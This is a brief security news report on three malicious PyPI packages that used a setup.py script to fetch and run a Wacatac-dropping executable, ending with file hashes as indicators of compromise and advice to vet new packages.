Rouge Package in PyPI Repository
Share this:
Researchers have discovered three malicious PyPI packages on the PyPI repository that were uploaded by the same actor, Lolip0p. The packages were discovered on January 10, 2023, and the packages “colorslib” and “httpslib” were published on January 7, 2023, while “libhttps” was published on January 12, 2023.
The packages were designed to drop malware on compromised developer systems and downloaded over 550 times in total.
The packages use an identical setup.py script that runs a PowerShell and runs a malicious executable (“Oxzy.exe“) hosted on Dropbox. The download URL has not previously been labeled as malicious, while the downloaded executable was identified as malicious by some security vendors.
Upon executing the file, another binary named update.exe is executed in a temporary folder
%USER%\AppData\Local\Temp.
The malware Wacatac is dropped on the developers’ systems, which can perform a broad range of malicious activities and deliver additional malicious payloads.
Python end users should always perform due diligence before downloading and running any packages, especially from new authors.
This research was documented by researchers from Fortiguard labs
Indicators of Compromise
Oxzy.exe
8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b
update.exe
293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757
SearchProtocolHost.exe
123fd1c46a166c54ad66e66a10d53623af64c4b52b1827dfd8a96fdbf7675638
